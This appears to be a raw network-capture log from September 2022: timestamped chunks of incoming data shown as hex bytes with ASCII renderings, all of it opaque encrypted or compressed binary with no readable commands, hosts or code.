                                                                                                                                                2022-09-29 12:51:28 UTC4948INData Raw: 21 b3 39 8d 42 53 d9 52 48 74 eb 91 60 03 bd f7 61 bd 1e cb 0c 06 96 2b 6d f6 c7 c2 10 3c 2c 92 41 b6 3c f2 f9 90 d5 9c a2 5e 9a 6e 73 86 06 6c 01 e0 ae cd c5 ec 23 d2 14 d0 fc cb b1 8c d7 52 0b 39 3f bf 96 53 50 27 9a f7 fc 33 60 3e 0e 50 f5 35 4a 0d ca 5f 32 8d c6 06 e8 9d 72 22 17 9b 95 a9 00 01 9e 61 6c fd e8 c7 cb fa c1 b3 df 56 e0 70 79 0b 35 ea 3a 16 ce a7 bd 00 ec 75 d7 6e f8 6e 0d 96 f2 03 10 e0 54 df 1d ea 6a e4 47 43 15 8d 20 c8 0c 7d 91 4e 4f 8d 25 95 12 63 8a 8d 07 8c 37 11 19 e7 2e b8 2c ea 67 7e e6 bf c2 94 7f 4c 1b ba 9c a9 99 d2 f1 bf 49 7a 52 e3 75 e0 2c bb 5d f7 1f 24 9c 18 e8 cf 86 f4 f5 49 8c 86 f0 4a 28 fc 4b 37 1d 88 27 21 3e bc 71 70 a8 d1 64 a3 1d a2 d4 45 66 d9 6c 42 d1 16 ba 5d 5b 8f 67 18 ed 2a b9 b5 9b 5a 60 b2 0b 5f 4b ca a7
                                                                                                                                                Data Ascii: !9BSRHt`a+m<,A<^nsl#R9?SP'3`>P5J_2r"alVpy5:unnTjGC }NO%c7.,g~LIzRu,]$IJ(K7'!>qpdEflB][g*Z`_K
                                                                                                                                                2022-09-29 12:51:28 UTC4964INData Raw: e2 e3 55 ce 6d f5 37 f6 52 1c 88 fe 96 e5 78 28 cd 93 92 a0 ef c8 d1 64 db 20 b3 23 64 a2 4b fc 64 52 27 cb da 13 95 35 a6 03 dd 18 5f 87 72 04 26 fc e6 17 e1 6e 28 9d 26 10 4f 1a 68 0f dc 5e 86 92 92 76 63 3b 6a 6d 98 3d b6 34 62 4f f0 89 e3 70 42 d3 93 d3 ee 35 37 32 e5 0f 0f 97 17 d5 00 56 da 25 3c ad 54 a8 00 46 66 13 13 6d c4 4d cd 74 1c 01 42 e0 e9 69 78 8f 06 c8 08 a8 1f a1 92 b3 46 5c 9a b9 32 84 45 7b ba a1 85 51 b9 60 42 c5 a2 c4 70 eb c9 44 09 ec eb 58 01 70 0d 34 11 36 ba 1a 96 93 a6 58 f5 b1 eb 38 6a 46 46 97 4b 78 80 2a e7 b2 60 20 34 f3 c4 4e ae a3 51 84 62 b9 99 93 02 62 6d 0e 6b 10 9e 2b 02 d8 4b 9c 38 64 e4 91 95 92 b4 66 55 8f 42 66 be 01 83 1c 6b fc 8d 79 57 0d 4e c6 ed f8 d4 c6 c4 d7 a9 9e f8 7e 62 37 f2 43 dd 33 43 6d 60 0e 7a bb 43
                                                                                                                                                Data Ascii: Um7Rx(d #dKdR'5_r&n(&Oh^vc;jm=4bOpB572V%<TFfmMtBixF\2E{Q`BpDXp46X8jFFKx*` 4NQbbmk+K8dfUBfkyWN~b7C3Cm`zC
                                                                                                                                                2022-09-29 12:51:28 UTC4980INData Raw: 29 00 fe 78 2c c3 2d a0 06 ab b6 37 40 dc 15 7d ea f7 47 f2 38 0e 9e 17 ea e9 a8 e2 b4 09 90 bb 37 03 6e 3f 15 f5 1c 54 a3 67 6e 2e 26 a0 cf 0e 63 7a ce 89 61 a1 62 a9 32 2d 1d f5 ae ad 86 a2 a3 cd 2f 00 90 26 f9 12 1e ff eb b7 86 ff d8 0e 44 d2 ad ae e6 07 91 db 96 47 de 5c f0 dd 02 7f b5 b1 19 e2 80 68 4f bf d1 7f 36 e3 3e be 68 50 04 c1 02 f2 43 f7 c2 72 4d 89 e1 b3 da 4a 11 07 9c 23 16 02 0b 51 4a 51 9a 64 bc 05 05 9d 52 0b b3 11 1f 3d 91 e2 84 59 47 b4 41 d7 de 2f c9 10 ee be af 9a 9f 6f 2b 77 9d 16 17 7c 1a 9d 2d e2 d8 98 ce 9a 77 4c 01 e3 30 06 5f 8c d2 46 fb 13 f8 62 e7 cd b1 e4 ea e8 d0 e6 22 8f ab 8e 6f 86 01 43 25 ec c5 b3 3e 69 8b c7 7e aa 36 ae be 32 2b c8 8b 36 b0 fd f0 2a 86 8a 71 3a 6f a2 55 17 b9 38 83 33 32 1e e6 a0 f4 4f 9e 21 d7 d5 c9
                                                                                                                                                Data Ascii: )x,-7@}G87n?Tgn.&czab2-/&DG\hO6>hPCrMJ#QJQdR=YGA/o+w|-wL0_Fb"oC%>i~62+6*q:oU832O!
                                                                                                                                                2022-09-29 12:51:28 UTC4996INData Raw: 8b ae 56 c3 02 12 11 ef 9b b3 3c 26 fd 93 47 8a 28 8c b3 c0 79 81 71 81 86 7f 98 a8 e2 6b dd bf 25 85 01 80 ce e6 cf 21 bf 77 d5 04 24 b9 f5 6c 3c e7 f5 b1 7d b1 07 4f de 02 78 1b be a4 35 37 7c 74 94 14 20 c7 4d 4a a7 c7 85 a1 12 76 3c e2 47 e4 a7 e3 cf a4 0a 04 ea 67 ff 7c e3 44 5f d4 cc 52 7e a8 b3 bf 16 af b8 13 08 3f ca 68 45 16 36 a0 ea db 03 04 a7 ab 66 25 be ff 49 c6 71 23 49 96 e8 fc 17 a6 29 6b 58 b2 d7 0e a7 8c 2d ea d5 f9 8e 9a 19 58 6b a3 63 fa 20 c7 b2 ef e3 fc 32 49 8f 39 0c 63 fd 75 ff 7f 25 00 ea a9 50 a9 ea d9 a2 42 31 88 30 a6 0d dd 8a 04 0c 67 b6 b3 97 59 21 d5 c1 60 37 ab 7b 60 22 d5 52 4d 92 a6 c3 8e c7 8d 17 f9 8c 29 7d aa 50 7d 4e 16 86 0b 71 af 4d 6b 36 8d f3 a4 5b 5f cf 60 2b 39 cd 2f 5b 28 18 7b 01 05 53 39 d5 48 9b 78 9a de 0c
                                                                                                                                                Data Ascii: V<&G(yqk%!w$l<}Ox57|t MJv<Gg|D_R~?hE6f%Iq#I)kX-Xkc 2I9cu%PB10gY!`7{`"RM)}P}NqMk6[_`+9/[({S9Hx
                                                                                                                                                2022-09-29 12:51:28 UTC5012INData Raw: b6 ad b5 de d7 a1 ef 43 e3 75 df 36 22 ce 39 fb da 22 2d e4 2b 88 02 28 80 08 13 b3 3e 2e 8f cd b9 ed 51 d5 d5 e7 59 ca 05 cd e0 b0 63 0e 60 2f a8 d8 00 0c 53 dc fa 61 cc 50 4c f2 72 60 79 8b 9c 50 81 2e 2f 88 4b c2 90 7e 24 d4 ed 74 b3 d8 3c 7e c4 63 83 93 55 4b af b1 5b 68 ad 60 54 27 cf 18 c1 2d e4 75 8d 4a 0c a2 3f 1c 76 f2 f5 8f 01 29 46 16 76 9b 46 f2 2a 36 36 24 68 c7 75 10 49 a6 59 49 89 b0 42 90 a7 eb be 36 1c f6 f3 d1 5d 03 7c 84 0e 3f 40 97 e9 8d 41 5c 2d 5e fd 62 ac 10 07 f7 dc bb e8 3b 7d ae 6d ec 2a f8 38 aa 6b 9d b8 80 12 a5 49 6d aa 59 54 17 b7 fa c6 12 ce 6d 52 28 6a fd c5 bc f9 93 33 a4 e0 0a 03 ec 29 a4 57 4f 39 f0 6a c8 6d 6c 64 ab 40 cd 6c ec 8d 30 95 14 8a 66 96 af 24 11 bb 93 da a5 1a eb b4 87 7d 43 63 be 9d 27 f1 4e 3e c0 3a 62 14
                                                                                                                                                Data Ascii: Cu6"9"-+(>.QYc`/SaPLr`yP./K~$t<~cUK[h`T'-uJ?v)FvF*66$huIYIB6]|?@A\-^b;}m*8kImYTmR(j3)WO9jmld@l0f$}Cc'N>:b
                                                                                                                                                2022-09-29 12:51:28 UTC5028INData Raw: ec ac fa ac 2d bf 62 8e a0 84 51 ca a7 e1 79 c0 f0 4d aa bb 38 4a 17 28 11 76 95 c6 bd d4 37 9d a4 ed 57 df 50 35 45 f3 16 fa 9e 1d 85 bc de 85 05 0b fd 0f 82 d3 24 e8 10 6c 28 02 a5 5f 64 4f d9 47 85 6a 2c 92 e4 eb 77 2f 22 91 f5 44 10 67 57 ab ca 8b 51 07 f2 6f c7 5d 8c 63 81 f2 72 df 65 6f fb 3a 16 7f 6a f2 8d 54 a1 2c a2 7a cf be a4 79 63 fa 93 fa dd 3c a7 c0 c6 e3 09 66 5e 0a fe d1 37 79 dc 1d 16 d6 92 47 7c 0a 60 30 dc ae ba a4 d8 63 2c 8f e3 71 79 60 a7 26 fa 1a f6 64 d1 3f 0c 59 7a 4b 70 65 0c e4 0f 10 e9 e3 20 c9 f3 27 6a ed ab 42 49 31 9b a2 af bd 2b 4c 7e dd 26 28 5d 23 dc 3c 44 60 e0 d7 08 c2 35 28 61 2d 1a c2 f7 ff e8 0f 02 90 a8 e2 34 8b 36 34 a3 4a 98 3d 88 73 da f6 da 24 fe 66 49 2d b3 ed ab 91 ac 14 3c 71 91 7c 65 cd d1 5d 6d a2 db 3c 56
                                                                                                                                                Data Ascii: -bQyM8J(v7WP5E$l(_dOGj,w/"DgWQo]creo:jT,zyc<f^7yG|`0c,qy`&d?YzKpe 'jBI1+L~&(]#<D`5(a-464J=s$fI-<q|e]m<V
                                                                                                                                                2022-09-29 12:51:28 UTC5044INData Raw: 5e e7 e2 b2 6a bc 1f 3f c6 90 08 2f 9e 27 11 26 55 77 ee 30 38 43 96 ff 46 e3 e5 5d b9 93 65 e9 86 f8 02 75 cd 58 de 1e 9c fa a1 14 e5 6c af 77 00 cf 32 83 ce 34 d8 b5 0e 77 17 52 de e9 f5 a3 9e ec 38 91 dc bb 0d e6 47 97 83 67 35 be 1f 67 b4 e2 d4 09 8d e4 0c c0 af 09 82 6c 57 af e1 bb 6c e2 79 e5 6a 78 0d bd 3a 3b 03 7e f8 d3 a7 fa 94 f8 e7 70 88 fa 22 10 ea 6b b4 a1 37 70 b0 92 53 66 8c 99 b3 81 26 df 6a ad 90 ff 96 61 79 c2 2a 8f 99 92 0a 77 2f 25 0f b6 78 08 ec b4 da 9e f2 2a 9d 69 7a 27 07 c7 96 dd 1d 92 92 ac 88 3d 47 d7 12 de fc 4c 88 9d dc c5 3d 99 34 7f 15 46 20 52 cd 29 f0 df 96 2b b2 bd 33 a8 f7 b8 9d 30 b5 5d d2 0a 1a a0 31 7f d7 2b 79 09 7b a0 6c 98 0d d5 88 42 9e ae 6b 80 0b 0e 50 8c 89 76 7f 43 b9 58 e5 2f fe 0a 13 70 9b ce 95 17 44 a4 81
                                                                                                                                                Data Ascii: ^j?/'&Uw08CF]euXlw24wR8Gg5glWlyjx:;~p"k7pSf&jay*w/%x*iz'=GL=4F R)+30]1+y{lBkPvCX/pD
                                                                                                                                                2022-09-29 12:51:28 UTC5060INData Raw: 79 11 e1 f8 e9 46 d0 bf 03 8b ac 70 ea 88 b1 dc f2 80 d4 96 e9 72 01 d6 e0 e8 52 32 bf 60 39 0d 26 9e b8 18 e8 ac 6f 13 f6 9a 6c a2 08 00 62 3e 17 d2 ec 91 4b 1a da 59 4b a9 d7 b0 82 97 8c 99 a7 90 33 e8 be 81 d0 93 f0 27 3d 96 e8 af d7 44 26 48 ca fd 59 8e 44 95 d7 31 6d 43 67 e4 ed b4 b6 7d dc 6a a8 c3 98 18 d5 32 50 34 48 d8 38 cb 63 b5 99 57 4c 9b 7e ab 14 1f 2d e8 05 74 17 59 de e5 9f 04 84 42 ff 89 a8 ad bd 7c 8f 64 db a6 50 b2 80 c2 d1 0b dd 90 52 84 61 03 b6 52 e0 b6 0d 6a 95 2d 15 16 6e 76 16 2b 39 4c 7e 2e 85 b6 2a 8a 5b 95 91 b5 d7 d8 75 c7 46 32 8a c2 9e 36 f3 72 89 db f5 2f bc 88 e1 30 af 0c d1 96 99 c8 7a 65 50 f2 71 fa 11 5d 48 be da 79 cf e5 14 97 7d d1 ea 54 eb c3 a5 b5 df d2 d8 2c 71 c5 57 48 59 81 44 f0 33 5d c9 df 05 27 98 25 bb 5d b2
                                                                                                                                                Data Ascii: yFprR2`9&olb>KYK3'=D&HYD1mCg}j2P4H8cWL~-tYB|dPRaRj-nv+9L~.*[uF26r/0zePq]Hy}T,qWHYD3]'%]
                                                                                                                                                2022-09-29 12:51:28 UTC5076INData Raw: 2d 81 b4 2e 63 50 d7 36 8d 58 9b a5 45 0c 0a 4d c7 77 f9 f7 2e 0d 19 5a 4e 3d 3d cf 63 ca 1f ad 5d fe 60 75 3d 87 91 da 28 2a af e8 5f 14 a4 72 75 11 41 8a e6 1e 88 a6 9b ce f6 9f a4 9c f8 57 bf b5 89 25 f7 ec a4 f8 4e 35 f4 0f 85 8d a7 61 71 79 84 c3 fa 90 37 99 71 c2 eb d9 e5 f2 10 b3 d7 0b 50 24 72 d3 cb 9a fc 6d c6 a7 81 b1 57 b1 6b 84 dd 72 20 88 be 6b 31 b3 c0 87 71 dd 02 06 ea bd 64 fc df 17 1c e1 b4 f5 f2 81 35 f5 2e 24 83 47 b1 cb b1 c3 1a ab 2f d6 ae 3d 24 81 b2 7a 70 bb d6 f8 ca a2 94 d8 eb 1e cf 1a 29 cc 1f e0 92 ab df 98 12 a5 25 ad f5 22 05 3e a9 4f 01 be 1c 48 eb 43 d5 0b 98 a2 f6 86 aa fc a3 31 75 28 ac b2 c7 91 ea 68 88 23 c5 20 81 ad 23 71 06 ad d6 34 52 34 fa a2 58 96 de fe 3f 4f 57 5a 37 80 0c e7 6f c1 77 01 e7 58 5d 7e 16 5a 52 ba 6a
                                                                                                                                                Data Ascii: -.cP6XEMw.ZN==c]`u=(*_ruAW%N5aqy7qP$rmWkr k1qd5.$G/=$zp)%">OHC1u(h# #q4R4X?OWZ7owX]~ZRj
                                                                                                                                                2022-09-29 12:51:28 UTC5087INData Raw: fa 65 3a a5 e5 31 05 7f cf 71 c4 fa dc cf 23 1b 3c 97 f5 ca f6 aa 15 b8 23 de 6b 80 01 6f 21 d5 61 70 93 18 7a 38 9b b6 9b e9 dd a2 8b 88 84 f0 b5 e6 e6 55 d1 8d 09 8a f3 74 1e d5 f5 49 b3 f6 6d 25 b3 23 e0 af 12 13 5f c4 36 d3 d5 3c 16 86 bc 5e 8d 6c 79 6f 51 8c 2a 03 a3 e8 e1 f7 e5 48 0c 12 47 f0 7e 8d 59 3d 18 09 d9 8f bf 69 99 e7 2c 0b 16 09 31 53 69 a9 b6 51 5e 88 fe c6 67 c7 11 45 88 0d 32 81 54 36 b8 31 28 35 ed ee 1b 36 73 1e 1a 36 b9 33 38 fd 71 a6 9a 43 f5 ef 1b 2c 45 ee 8b 1f 54 51 d0 82 0d ab b9 bc dd e0 a0 9c 9c 59 21 d4 87 94 b7 5e 5b c6 41 43 ac d4 f0 31 d8 1d 60 c2 62 97 ac 61 a7 a2 3a e7 b4 c4 ed 18 45 30 88 25 41 47 b6 5a 48 2d a6 d1 a4 6d b4 c7 3a 9e 1f 39 2e 6c 6a 68 d2 6c 1e f0 10 17 f1 ef 3f 9c b7 b7 c9 71 79 7d 05 b5 42 72 43 0f 23
                                                                                                                                                Data Ascii: e:1q#<#ko!apz8UtIm%#_6<^lyoQ*HG~Y=i,1SiQ^gE2T61(56s638qC,ETQY!^[AC1`ba:E0%AGZH-m:9.ljhl?qy}BrC#
                                                                                                                                                2022-09-29 12:51:28 UTC5103INData Raw: 24 74 67 e6 a8 42 01 d4 f6 e3 e4 4d 74 2b 97 b4 a1 c0 d0 b4 18 7c 5d 66 b3 26 be 49 c2 37 71 3a 8b 99 4f 0f 2f 62 85 44 57 c7 12 12 ac 54 c3 ac ff c2 b5 8a 06 3e 8b f6 f9 8b be 31 df 1b 0b 6a 44 c7 df 31 8d a9 8c 54 b8 ac 40 ce 38 74 c6 5f 3b a1 ab d6 ba ca 34 7e 03 9a fd 1f 63 44 f7 03 f0 24 9b 1f f2 e2 f0 b3 85 8d 33 88 3d dd 0d 80 4e 28 19 13 86 fa 81 87 84 45 c2 a9 7f 7e da 68 6e 31 32 ef a9 e9 5c 3d ac 6a 9d 74 cf d7 88 d5 95 59 4c d5 16 25 47 13 20 53 b7 96 d8 b5 b0 45 88 71 cc 8a 63 6b f4 b3 27 ea b3 d6 6c 43 68 91 9e 31 64 8d 3d 36 2d 41 8f e7 f8 13 fc cd 3d 2f de a1 19 88 ea 67 bd b4 54 23 65 97 67 76 74 ea c3 aa 3b bc eb d7 70 fe 35 0f 67 a0 78 31 c4 f1 26 4c 56 fb 57 ca 7c 43 2e 1f cc 69 c8 4d a8 98 f7 24 0e 3c d4 61 95 0f 2e 15 1c ce f2 13 a5
                                                                                                                                                Data Ascii: $tgBMt+|]f&I7q:O/bDWT>1jD1T@8t_;4~cD$3=N(E~hn12\=jtYL%G SEqck'lCh1d=6-A=/gT#egvt;p5gx1&LVW|C.iM$<a.
                                                                                                                                                2022-09-29 12:51:28 UTC5119INData Raw: 21 c6 c8 ac e0 9a a4 60 e6 eb 91 9e 7b 5f a4 8a 3e cf a8 46 be 34 b5 83 af b8 9b ca 28 c4 13 0b 2a f4 9a a7 6d c9 6a e2 63 1b 18 8f 25 d5 82 6e 21 c4 8d c8 66 21 f4 66 54 7d 80 09 35 83 99 4e b4 13 8a bd 43 a0 b3 2a 96 af c5 d8 b9 c0 59 53 dd b9 88 4f 15 b0 ca 7c de d7 97 64 c4 71 28 82 ce 5a 1d 95 5a 6c e5 42 9e c2 5a b5 7f 2f 47 1c 36 33 9e e9 2f 55 c3 e5 bf 77 99 72 d0 b6 b4 b7 71 17 95 2c a3 c5 56 db 08 60 89 3e 97 02 4f d2 68 a1 11 bd af 91 00 29 ea 41 f2 02 49 ea 63 e6 b7 ed 0e 46 cd 5b f0 be 47 e4 cd c7 76 fb d1 86 83 64 fa 93 7c 83 0a b0 25 7e 9e da dc 1b 6e df 44 e0 29 2f 0d a8 24 d9 20 69 60 57 ab 7d d5 f7 a9 be 3d 71 88 d2 18 ea d7 e7 bc 70 6f 6f c5 25 26 3c 7e be 87 e3 9d d4 be a3 20 55 28 23 ed 4c b5 25 b2 ec 49 29 6c 1a e2 d6 05 d3 2a c3 2f
                                                                                                                                                Data Ascii: !`{_>F4(*mjc%n!f!fT}5NC*YSO|dq(ZZlBZ/G63/Uwrq,V`>Oh)AIcF[Gvd|%~nD)/$ i`W}=qpoo%&<~ U(#L%I)l*/
                                                                                                                                                2022-09-29 12:51:28 UTC5135INData Raw: 01 10 90 78 f5 fd 2b 2e a7 e6 a7 b2 89 c8 bf 9f 58 87 eb 4b 4c 1b a1 29 66 52 08 48 7d 90 12 d2 b7 ab 70 51 2c f6 46 d7 e8 3b 7b fe 20 14 ef fb ae 6b 8c bd d1 e6 00 0c d4 83 42 d9 c6 ef a5 bb 48 b7 c2 b0 88 af 85 de 9f 19 cf be 00 1f 81 40 43 db 3c 76 aa 19 b7 9e 93 78 6b c8 32 f9 84 0a 60 15 4f 7c 66 f7 08 cb 4f 90 37 3d 4d a7 4f 83 1d ac a6 a9 71 76 95 f4 93 05 cb 99 5c 6f e9 7d b6 68 03 80 ba 86 b8 7b ad 50 3e da 05 37 48 4b 6d 79 84 5f 7e c3 07 03 41 1c 5a 47 3e 6c 62 d0 c9 d4 d0 cf d0 34 d1 50 66 38 c7 32 e8 51 64 c0 fb 27 44 b4 04 58 ef 58 87 84 35 42 d3 1e 39 bd c1 78 47 f8 04 60 a5 5e 4a 94 14 c7 52 78 07 90 65 10 f7 4a 7f 1c b4 d5 08 d8 fa 73 50 2b 34 5a ba 20 39 a4 a1 be c4 1b d3 c7 46 aa 6a 6b f9 07 7b 5c 0e d8 4d 01 80 4f d3 50 97 64 85 85 0e
                                                                                                                                                Data Ascii: x+.XKL)fRH}pQ,F;{ kBH@C<vxk2`O|fO7=MOqv\o}h{P>7HKmy_~AZG>lb4Pf82Qd'DXX5B9xG`^JRxeJsP+4Z 9Fjk{\MOPd
                                                                                                                                                2022-09-29 12:51:28 UTC5151INData Raw: 5d 0f da da 84 48 bd 62 02 05 61 c0 95 47 34 74 51 e8 24 53 b7 20 b6 01 a3 f8 d7 c8 6f 57 99 be 6c cd 37 70 18 b8 ca a3 33 20 26 66 7a 6e 6a d9 80 32 ee b1 3c af 6a ac 87 f9 7b f6 9c d2 d1 fe b6 3e 8e 90 d6 09 1c 69 59 4f b0 70 7b 7f 36 91 cc f7 06 ad 2e 81 da dd 11 3c d3 82 a2 5a 3e 3a f6 c4 df 0b f7 81 ea 7d 42 42 1f 8e 34 f9 16 6b 8f 23 9f 61 9a 78 9f 79 e3 75 36 31 9b 77 4f 3d 0f ee d0 91 31 25 a3 92 6a 83 74 91 69 fb 0d b0 f1 51 11 90 2b 69 28 d3 45 6a 6d 4a 26 17 12 65 c5 e1 c7 9d 2f cd b6 d4 de 81 0f 85 35 47 95 cb 43 2e f5 f7 30 05 09 7d 9c 6d 6a 90 5e f3 a4 2f e1 27 81 0e 8b e7 c6 44 c3 6c d2 02 22 e2 3e cb c5 f8 dc fc e1 b0 0d fd bc eb 09 de b7 48 ad 7b 3b e9 5c 9d 7c 95 75 0f 5d 74 ef ca ed 95 a2 d9 1d 07 27 96 6d b0 52 20 25 cb 9f c9 05 cd b5
                                                                                                                                                Data Ascii: ]HbaG4tQ$S oWl7p3 &fznj2<j{>iYOp{6.<Z>:}BB4k#axyu61wO=1%jtiQ+i(EjmJ&e/5GC.0}mj^/'Dl">H{;\|u]t'mR %
                                                                                                                                                2022-09-29 12:51:28 UTC5167INData Raw: 9e 61 4f 00 85 99 93 61 f7 f6 fe e2 a0 4d 90 9d 7b 7f 31 47 b9 12 db f9 f4 e5 dc e6 3a eb e2 e3 9f ea 48 ce 81 c9 e2 4c cc be 7a 3a 0a 10 c7 12 a1 12 fc 19 d3 0b c3 b7 c8 b2 1f 38 c6 5b 94 cc 68 34 b8 d8 6d aa ed 91 16 1e bc 57 a4 0b 05 35 11 83 64 4a e7 a8 64 19 8b 49 b7 d6 ba c2 2b 6c 0f 39 83 13 16 c6 7e 75 ea 48 0e 65 51 03 17 49 81 8f ac c3 db c0 87 40 dc 11 6b e5 22 b2 c7 3a 9c 8e f5 89 e0 15 1c 7d bd d4 cb 88 4e b4 79 72 76 77 a2 7e 1b 17 5c 66 fd 68 a4 55 5c 75 0a 6a 55 26 1a ec 71 17 4f b5 02 bf 54 b1 22 e1 c8 9b a8 fe 6c f0 2e e1 c3 87 09 d5 0e 27 a8 ff 74 8e 8b 7c d3 35 5f ff ba 29 12 98 b0 61 80 20 ec ef b5 7d 40 ca eb b8 6c 8c 4d af 38 ee ed de 96 89 3c a7 a0 1e 0d 09 ce 5f dc 23 66 a3 b5 51 8a 2f 60 4c 1c 01 a9 23 e7 8c fa 81 0f e2 80 bf 0e
                                                                                                                                                Data Ascii: aOaM{1G:HLz:8[h4mW5dJdI+l9~uHeQI@k":}Nyrvw~\fhU\ujU&qOT"l.'t|5_)a }@lM8<_#fQ/`L#
                                                                                                                                                2022-09-29 12:51:28 UTC5183INData Raw: 66 37 ab 2a df 2c cb 30 39 bb 21 aa c8 94 5b c8 3e 58 ba 5c 0f 7d 1c 2f bd fd 5c 4e bf 63 5a 4d 7d aa 78 6c ea 54 2a 6d 4a 28 ca 6c cf 97 01 ae c9 eb 72 4f 39 54 f8 01 e3 f6 1b ba 09 74 aa 0b 5a 91 b2 86 f2 aa 77 9f 47 13 4d 12 a0 a8 31 9e bc 80 99 35 1d 48 79 1d 05 f3 85 bc a8 15 37 04 db c7 09 62 ad 88 c8 77 8d 06 98 9c 48 05 a6 5c ee 35 b6 57 8e ad 85 a4 07 80 da 01 c5 67 57 96 7f 0d ca 60 8d 33 bb 86 6c c1 85 eb 94 06 45 9b 69 c7 f6 93 3f 20 0a f8 c6 77 c7 c9 fc 1b a7 62 51 0a c1 af 44 e8 74 14 f8 a1 15 af 19 f6 82 97 5c f3 d4 00 54 44 1c 83 f2 d9 2d 99 f7 74 63 ce 88 1f 2b fe dd 4d 51 c9 68 8e d3 fb 2f d8 d4 33 3e 21 5c a4 f6 48 27 f3 ae 1f 4a 06 e8 3c 37 c2 e6 4a 49 45 33 e2 a4 19 ed b0 d7 84 53 64 c7 38 0f 51 90 13 00 ad b6 72 6d 90 b3 c8 a5 81 94
                                                                                                                                                Data Ascii: f7*,09![>X\}/\NcZM}xlT*mJ(lrO9TtZwGM15Hy7bwH\5WgW`3lEi? wbQDt\TD-tc+MQh/3>!\H'J<7JIE3Sd8Qrm
                                                                                                                                                2022-09-29 12:51:28 UTC5199INData Raw: 96 e7 61 a2 6b 05 d0 90 f0 ce fa a1 4b ec ab e0 80 74 26 87 52 eb 1f be 87 75 f6 e1 d9 65 7a 4b 7d ea ab dc 3f 28 c8 fd e5 9b a3 84 20 e4 8d 48 cb 16 81 4b ed 9f e9 2e 6e 41 c4 d4 6a 80 35 05 bc 5c 28 6a 7c 0f 91 5f 74 4c 70 92 b2 a0 5d 26 2d 4a 13 c9 0c 53 44 2f c6 92 99 d9 0f b3 ae 14 c4 ca 58 3f e1 65 16 3c c3 33 7c 85 00 3c e4 a2 cb 91 32 e6 12 63 f2 3c 48 b4 fd 3e 71 42 65 54 81 39 76 42 5f af 9f bd 87 81 81 69 4a 61 73 a3 e9 c0 8c 5b 6e 67 f2 28 35 73 7d bf 08 09 58 53 5b 93 75 6c b2 8b ba fc 00 f1 6d a1 4f 6e 8e b1 08 9e cb 85 c7 48 a4 a9 f5 62 84 7a 81 31 f0 1e 30 0a 48 78 36 ba ad 81 40 5b 28 b2 97 da 77 13 c5 c0 22 15 51 b6 49 0d be 0d ed dc 71 a0 65 3a f2 31 f2 7d 18 80 81 59 26 76 60 79 d6 0c 4e cd e6 50 6b 0c 32 91 1e f6 28 99 d9 63 2c 37 42
                                                                                                                                                Data Ascii: akKt&RuezK}?( HK.nAj5\(j|_tLp]&-JSD/X?e<3|<2c<H>qBeT9vB_iJas[ng(5s}XS[ulmOnHbz10Hx6@[(w"QIqe:1}Y&v`yNPk2(c,7B
                                                                                                                                                2022-09-29 12:51:28 UTC5215INData Raw: a9 11 d8 2b e6 7c 43 2a 82 fc e2 85 ac d0 ac 1b 9c f8 ec 14 d7 d5 e7 7c 13 6f ce 70 cc e6 fd 8a 97 41 f6 be 8b e9 b4 6b 28 71 11 96 1f bf 5c 5b aa 08 02 43 fb 1e 20 5f 47 f8 96 e6 e1 ed 3c 50 9a 25 a6 5e 71 34 e5 89 e0 51 4e b5 27 42 33 43 e4 14 2a 7f ea 05 c4 35 34 c4 58 c3 4d b2 af 8f 86 39 e7 d0 f1 8a b7 ad ee b9 eb a4 a9 f2 50 ba 5b 2d a0 63 3c 3d 49 c0 46 37 9f c2 dd 52 40 57 d7 3a 5a 74 39 e4 3f 50 92 ab 66 42 59 2b e1 7f de 98 24 c1 82 2d 1c 97 30 5a a7 ef 5c 50 18 fc 22 b7 1d 46 cf 32 e9 3a 4b 2c 85 24 fb d0 4e b9 36 14 1a 05 70 2d 89 bc 6b 06 84 40 a5 55 12 ca 76 ae 70 10 6d 82 47 7f 48 1b f9 a4 4c ef e3 b9 39 e7 f3 31 fa 46 6e a1 13 c4 df 2e f4 89 ad 16 92 62 9d bc bc 23 d7 f7 11 fb 00 fe 57 74 b2 b8 aa 94 6e 90 d5 4f ff 60 e1 7a 46 b3 2e fa e7
                                                                                                                                                Data Ascii: +|C*|opAk(q\[C _G<P%^q4QN'B3C*54XM9P[-c<=IF7R@W:Zt9?PfBY+$-0Z\P"F2:K,$N6p-k@UvpmGHL91Fn.b#WtnO`zF.
                                                                                                                                                2022-09-29 12:51:28 UTC5231INData Raw: 70 24 1e f2 c7 99 0a e2 2b 53 c1 8d dd f1 ec 2f 81 4a b5 be 95 65 88 08 14 42 70 0b a1 b7 75 e2 75 9a 0e c3 60 f3 5e f5 66 20 e4 f9 90 a6 30 6f b9 e7 a6 ad 50 4e cb 89 dd fc e4 b1 de 5c 3d eb 5b 62 37 93 34 ed 8b 1a 99 d6 3e de 4d c8 d4 05 b9 bd e7 ee b7 0d 44 60 15 67 79 d7 91 9b 7f 60 19 5d a5 9f a2 04 98 e1 01 42 ef 00 36 29 3c 75 3e c3 7e c2 55 44 cf ff e4 e8 3f 12 4d 8c 6b 67 fd d9 68 65 e1 87 2d 17 b6 07 63 9d 4e 5b dd 44 61 b9 ae 67 20 7c f0 22 84 56 d1 8b 97 11 ea ee 21 58 4f 2e 01 01 8e be 35 39 bd bb e6 d4 b5 9e 05 cd b1 cb a1 88 ac 58 74 39 73 1f 29 1e c5 2e 0c d4 9e d5 97 6f e6 ab 63 1c 85 f1 30 a5 4a 20 e7 7c 92 55 e8 1e 8e 78 d6 c0 d4 26 78 bf 4c ae b3 5d 8a b0 93 d7 44 d8 1a 5e d3 0a 46 87 cc bd 03 f3 95 eb 9f e9 af 9e 1a 6a d3 09 a4 4f d8
                                                                                                                                                Data Ascii: p$+S/JeBpuu`^f 0oPN\=[b74>MD`gy`]B6)<u>~UD?Mkghe-cN[Dag |"V!XO.59Xt9s).oc0J |Ux&xL]D^FjO
